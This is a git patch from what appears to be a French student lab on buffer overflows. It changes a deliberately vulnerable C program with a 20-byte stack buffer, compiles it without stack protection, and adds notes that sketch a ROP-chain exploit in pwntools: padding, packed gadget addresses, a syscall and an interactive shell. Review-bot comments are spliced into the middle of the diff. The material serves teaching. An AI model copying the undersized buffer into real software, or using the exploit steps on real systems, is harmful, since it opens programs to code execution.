From e6cf606ab4d3be75c022345d17ed49e03d2c6707 Mon Sep 17 00:00:00 2001
From: luevard
Date: Sat, 7 Oct 2023 14:37:22 +0200
Subject: [PATCH] :sparkles: PRESQUE FINI
---
 Bufferoverflow/main.c | 17 ++++++++---------
 Dockerfile | 7 ++++---
 TP.txt | 19 +++++++++++++++++++
 3 files changed, 31 insertions(+), 12 deletions(-)
diff --git a/Bufferoverflow/main.c b/Bufferoverflow/main.c
index ae20590..e12b4c7 100644
--- a/Bufferoverflow/main.c
+++ b/Bufferoverflow/main.c
@@ -1,12 +1,9 @@
 #include
+#include
+#include
+#include
-void secretFunction()
-{
- printf("Congratulations!\n");
- printf("You have entered in the secret function!\n");
-}
-
-void echo()
+void check()
 {
 char buffer[20];
 printf("Enter some text:\n");
@@ -16,6 +13,8 @@ void echo()
 int main()
 {
- echo();
+ check();
 return 0;
-}
\ No newline at end of file
+}
+
+//python3 ROPgadget/ROPgadget.py --binary Bufferoverflow/binaire --ropchain
diff --git a/Dockerfile b/Dockerfile
index 078b313..7541021 100644
--- a/Dockerfile
+++ b/Dockerfile
@@ -1,16 +1,17 @@
 FROM ubuntu:latest
 RUN apt-get update && \
- apt install -y python3 gcc musl-dev python3-pip && \
+ apt install -y python3 gcc musl-dev python3-pip gdb nano && \
 python3 -m pip install ROPgadget && \
- python3 -m pip install capstone
+ python3 -m pip install capstone && \
+ python3 -m pip install pwntools
 COPY Bufferoverflow /root/Bufferoverflow
 COPY ROPgadget /root/ROPgadget
 WORKDIR /root/Bufferoverflow
-RUN gcc main.c -o binaire -fno-stack-protector
+RUN gcc main.c -o binaire -fno-stack-protector -ggdb -Wl,-z,relro,-z,now,-z,noexecstack -static
 WORKDIR /root
diff --git a/TP.txt b/TP.txt
index d56c722..f0ab785 100644
--- a/TP.txt
+++ b/TP.txt
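Review bot: `void check()` is declared with empty parentheses, which under C11 is an unprototyped declaration rather than "takes no arguments", so the compiler cannot check calls against it; `void check(void)` is the conventional form, and the same applies to `int main()` in the second hunk of this file. The 20-byte `buffer` is also left without any comment even though the whole exercise depends on it being undersized: a line such as `/* Deliberately small stack buffer for the overflow exercise; not a pattern to reuse in real code */` above the declaration would make the intent explicit for anyone who later builds on this file. check()'s body continues past the end of the hunk, so the statement that fills the buffer is not visible here and I could not confirm how it reads its input.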
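Review bot: The `//python3 ROPgadget/ROPgadget.py --binary Bufferoverflow/binaire --ropchain` line appended after the closing brace of main() stores a tooling command inside the C source, where it neither documents the program nor gets executed, and this same commit already writes the identical command into TP.txt. I would drop the duplicate from main.c; if it must stay in the source, turn it into a header comment that says what it is for, e.g. `/* Gadget-enumeration command used in the exercise; see TP.txt */`, so a reader does not mistake it for disabled code.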
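Review bot: The new `RUN gcc ...` line produces a binary whose addresses students copy by hand (TP.txt in this commit quotes `0x0000000000401fa4`), yet `FROM ubuntu:latest` and the unpinned `apt install` / `pip install` lines let the compiler, libc and tooling change on every rebuild, so the recorded addresses can silently stop matching the image. Pin the base image to a release tag (ideally with its `@sha256:` digest) and consider pinning the ROPgadget and pwntools versions so the lab stays reproducible. As far as I can tell `-z,now` has little effect on a `-static` link, since there is no lazy dynamic binding to disable; that is harmless, but the line would benefit from a comment stating that the canary is off and the link is static on purpose, e.g. `# Lab target: -fno-stack-protector and -static are intentional for the exercise; not a template for real builds`.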
@@ -1,2 +1,21 @@
 Combien de gadgets possède le binaire nommé "binaire" dans le dossier Bufferoverflow ?
+---
+
+docker build . -t secu
+
+docker run --rm -it secu
+
+---
+
+python3 ROPgadget/ROPgadget.py --binary Bufferoverflow/binaire --ropchain
+
+dans un fichier python :
+ p = b'A' * 120 => buffer overflow
+ p += pack(' p += p64(0x0000000000401fa4) # syscall : on convertit en p64 car la convertion est nul
+
+ r.process("./binaire") => on execute le binaire
+ r.sendline(p) => on met dans le buffer toutes les adresses et l'attaque Bufferoverflow
+ r.interactive() => on met a disposition le shell interactif sur le terminal
+
+
\ No newline at end of file